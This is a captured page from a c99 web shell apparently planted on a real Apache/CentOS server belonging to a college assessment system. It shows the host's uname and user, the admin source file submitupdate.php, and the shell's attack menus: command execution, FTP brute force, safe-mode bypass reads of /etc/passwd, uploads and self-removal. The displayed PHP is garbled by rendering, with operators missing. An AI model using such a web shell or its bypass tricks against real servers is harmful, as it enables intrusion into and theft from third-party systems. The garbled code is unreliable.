!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     submitupdate.php (9.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
//showHeader();
require_once('../lib/nusoap/nusoap.php');
include_once 
"../link/function.php";
include_once 
"../class/clsFileUpdate.php";
include_once 
"../class/clsFileUpdate.php";
include_once 
"../class/clsFileUpdateTemp.php";
include_once 
"../global0.php";
    
openWindow();
autotab();

$oCA = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);
$oFd = new FileUpdate($oCA);
$oFdt = new FileUpdateTemp($oCA);
/////////////////////////////////////////////////////
    
$collegecode=$GLOBALS["COLLEGECODE"];
    
$sysId=$GLOBALS["SYS_ID_E"];
      
$savefiletodir="../../";  // real
    
$server_path=$GLOBALS["SERVER_PATH"];
////////////////////////////////////////////////////    
?>
<?                    
    $p
=getcwd();
    
    
// Create the client instance
    
    
$client = new soapclient($server_path);
    
$err $client->getError();
    if(
$err){
        echo 
'<h2 style="background-color:#ff0000">Constructor error</h2><pre>' $err '</pre>';
        
?>
        <script type="text/javascript">
                parent.location.href = "updatefile.php?nofile=3";
        </script>
        <?
    
}
    
    
// Call the SOAP method
    
if($success!="1"){
        
$result $client->call('update', array('collegeCode' => $collegecode,'sysId' => $sysId));
        
$cv=$result;
        
    }
    if(
$client->fault){
        echo 
'<h2>Fault call method update</h2><pre>'print_r($result); echo '</pre>'
    }else{
        
$err $client->getError();
        
//echo $err;
        //echo $result;
        //echo $fileid_want;
        
if($err || ($result=="" && $fileid_want=="")){   //can not connect server  
            
echo '<h2 style="background-color:#ff0000">Error</h2><pre>' $err '</pre>';
                
$fileerror="1";
                if(
$oFdt->countfile()=="0"){
            
?>
                    <script type="text/javascript">
                            parent.location.href = "updatefile.php?nofile=3";
                    </script>
            <?
                    
                
}else{
                
            
?>
                    <script type="text/javascript">
                            parent.location.href = "selectfile.php?fileerror=1";
                    </script>
            <?
                
}
        }else{        
            echo 
'<h2>Result</h2><pre>' $result '</pre>';                
            if(
$result=="No"){ 
                
$counttotal=0;
                
?>
                <script type="text/javascript">
                    parent.print_output(1,1);
                </script>
                <script type="text/javascript">
                        parent.location.href = "updatefile.php?nofile=1";
                </script>
                <? 
            
}else{
                if(
$success!="1"){
                    while(
$cv!=""){
                        list(
$ff,$cv)=split(',',$cv,2);
                        
$cu++;
                    }
                    
$counttotal=$cu;
                }
                
                
//echo "===============$counttotal";
                
$pathnow=getcwd(); 
                
//create folder fileupdate    
                
if ($handlef opendir(getcwd())) {
                    
$checkfolder=0;
                    while (
false !== ($file readdir($handlef))) {
                        if(
$file=="fileupdate"){
                            
$checkfolder=1;
                        }        
                    }
                    if(
$checkfolder==0){
                        
mkdir("fileupdate",0775);
                    }
                    
closedir($handlef);
                }
                    
                
//loop change result                
                
list($fileid_want,$result)=split(',',$result,2);
                
//echo "fileidwant=".$fileid_want."<br>";
                //echo "result=".$result."<br>";
                
$names = array($collegecode$fileid_want'filename1''filename2','path','text','detail','flagfile','sysId','updatetime','textcode',getNowDateth());
                
$result1 $client->call('getfile',array('names' => $names));     
                if(
$client->fault){
                    echo 
'<h2>Fault call method getfile</h2><pre>'print_r($result); echo '</pre>';
                }else{
                    
//check data--------------------
                    
$text_en=$result1[5];
                    echo 
"first=<br>".$text_en;
                    echo 
"<br>";

                    
$text_en=base64_decode($text_en);
                    echo 
"base64_decode1=<br>".$text_en;
                    echo 
"<br>";
                    
                    
$text_en=gzuncompress($text_en);
                    echo 
"gzuncompress1=<br>".$text_en;
                    echo 
"<br>";
                    
                    
$text_en=base64_decode($text_en);
                    echo 
"base64_decode2=<br>".$text_en;
                    echo 
"<br>";
                    
                    
$text_en=gzuncompress($text_en);
                    
$textwrite=$text_en;
                    echo 
"gzuncompres2s=<br>".$text_en;
                    echo 
"<br>";

                    
$text_en2=base64_decode($text_en);
                    
$text_en=base64_decode($text_en);

                    
$text_en=substr($text_en,26,10);
                    
$test_en=base64_encode($text_en);
                    
$text_en=md5($test_en);
                    
                    if(
$text_en==$result1[10] || (($text_en!=$result1[10]) && ($result1[7]=="3"))){
                    
                        
chdir($pathnow);
                        
$result1[6]=base64_decode($result1[6]);
                        
                        echo 
'<h2>-------------------------</h2>';
                        echo 
'<h2>collegeCode</h2><pre>' $result1[0]. '</pre>';
                        echo 
'<h2>fileId</h2><pre>' $result1[1]. '</pre>';
                        echo 
'<h2>filename1</h2><pre>' $result1[2]. '</pre>';
                        echo 
'<h2>filename2</h2><pre>' $result1[3]. '</pre>';
                        echo 
'<h2>path</h2><pre>' $result1[4]. '</pre>';
                        echo 
'<h2>text</h2><pre>' $result1[5]. '</pre>';                       
                        echo 
'<h2>detail</h2><pre>' $result1[6]. '</pre>';
                        echo 
'<h2>flagfile</h2><pre>' $result1[7]. '</pre>';
                        echo 
'<h2>sysId</h2><pre>' $result1[8]. '</pre>';
                        echo 
'<h2>updatetime</h2><pre>' $result1[9]. '</pre>';  
                        echo 
"-------------------------------------<br>";
                        
                        
//set path and create folder
                        
$path="/fileupdate".$result1[4];
                            
                        
$pathfile=$path;
                        
$i=1;
                        while(
strrchr($pathfile,'/')!=""){
                            
$f=strrchr($pathfile,'/');
                            list(
$p,$fo) = split('[/]',$f);
                            
$folder[$i]=$fo;
                            
//echo $folder[$i]."<br>";
                            
list($pathfile,$p) = split($f,$pathfile);
                            
$i++;
                        }
                        for(
$j=1$j<$i$j++){
                            
$newf[$j]=$folder[$i-$j];
                            
//echo "newf=".$newf[$j]."<br>";
                        
}
                        
////
                        
for($k=2$k<=$j$k++){
                            
$checknotfound=0;
                            
$checkfound=0;
                            
chdir($newf[$k-1]);
                            if (
$handle opendir(getcwd())) {
                                
$checknotfound=0;
                                 while (
false !== ($file readdir($handle))) {
                                    if (
$file != "." && $file != "..") {
                                        if(
$file==$newf[$k]){
                                            
$checkfound=1;
                                        }else{
                                            
$checknotfound=1;
                                            
$save=$newf[$k];        
                                        }
                                    }else{
                                        if(
$file==$newf[$k]){
                                            
$checkfound=1;
                                        }else{
                                            
$checknotfound=1;
                                            
$save=$newf[$k];
                        
                                        }                   
                                    }
                                }
                                if(
$checknotfound=="1" && $checkfound!=1){
                                    if(
$save==""){
                                                            
                                    }else{
                                        
mkdir($save,0775);
                                        
//chmod($save,0775);
                                    
}        
                                }
                                
closedir($handle);
                            }        
                        }
                        
/////
                        
                        
$fileIwant=$result1[3];
                        
                        
unlink($fileIwant);
                        
//if not delete file
                        
if($result1[7]!="3"){
                            if (!
$handle fopen($fileIwant'a')) {
                                echo 
"Cannot open file ($fileIwant)";
                                
$error=1
                            }
                            if (
fwrite($handlebase64_decode($textwrite)) === FALSE) {
                                echo 
"Cannot write to file ($fileIwant)";
                                
$error=1;
                            }
                        }
                        
                        if(
$error!=1){
                            
//echo "Success, wrote to file ($fileIwant)";
                            
$oFd->SearchByfileId($result1[1]);
                            if(
$oFd->GetRecord()=="1"){
                                
$oFd->Delete();
                            }
                            
                            
$oFd->AddNew();
                            
$oFd->fileId=$result1[1];
                            
$oFd->updateDate=getNowDateth();
                            
$oFd->filename1=$result1[2];
                            
$oFd->filename2=$result1[3];
                            
$oFd->flagfile=$result1[7];
                            
$oFd->flagupdate="D";
                            
$oFd->path=$result1[4];
                            
$oFd->detail=$result1[6];
                            
$oFd->sysId=$result1[8];
                            
$oFd->updatetime=$result1[9];
                            
$oFd->flagselect="N";
                            
$oFd->flagrestore="N";
                            
$oFd->flaguse="N";
                            
$oFd->Save();
                            
                            
$result2 $client->call('set_to_db', array('fileId' => $result1[1],'collegeCode' => $collegecode));
                            if(
$client->fault){
                                
$oFd->SearchByfileId($result1[1]);
                                
$oFd->GetRecord();
                                
$oFd->Delete();
                                echo 
'<h2>Fault call method set_to_db</h2><pre>'print_r($result); echo '</pre>';
                            }else{
                                
$folderfile=getcwd();
                                if(
$result2=="Y"){
                                    
$oFdt->AddNew();
                                    
$oFdt->fileId=$result1[1];
                                    
$oFdt->Save();
                                    
chdir($pathnow);    
                                }
                            }
                        }else{
                            
$oFd->SearchByfileId($result1[1]);
                            
$oFd->GetRecord();
                            
$oFd->Delete();
                        } 
// if error ==1
                        
                    
}else{
                        
$fileerror="1";
                        if(
$oFdt->countfile()=="0" || $oFdt->countfile()=="1"){
                        
?>
                                <script type="text/javascript">
                                        parent.location.href = "updatefile.php?nofile=4";
                                </script>
                        <?
                                
                        
}else{
                        
?>
                                <script type="text/javascript">
                                        parent.location.href = "selectfile.php?fileerror=1";
                                </script>
                        <?
                        
}        
                    }  
//check error file md5()
                    
                
//if err method getfile
                
$countbar++;
                
//echo "============= $countbar";
                
$total=$counttotal;
                
?>
                <script type="text/javascript">
                    parent.print_output(<?php echo $countbar;?><?php echo $total?>);
                </script>
                <?                                                
                
if($result=="" && $fileid_want!=""){
                
?>
                <script type="text/javascript">
                    parent.location.href = "selectfile.php";
                </script>
                <?
                
}     
                echo 
"<meta http-equiv='refresh' content='0; URL=submitupdate.php?result=$result&check=$check&fileid_want=$fileid_want&fileerror=$fileerror&success=1&countbar=$countbar&counttotal=$counttotal'>";                            
            }  
//if result not No
        
// if err method update     
    
// if fault
?>
<?php
//showFooter();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0127 ]--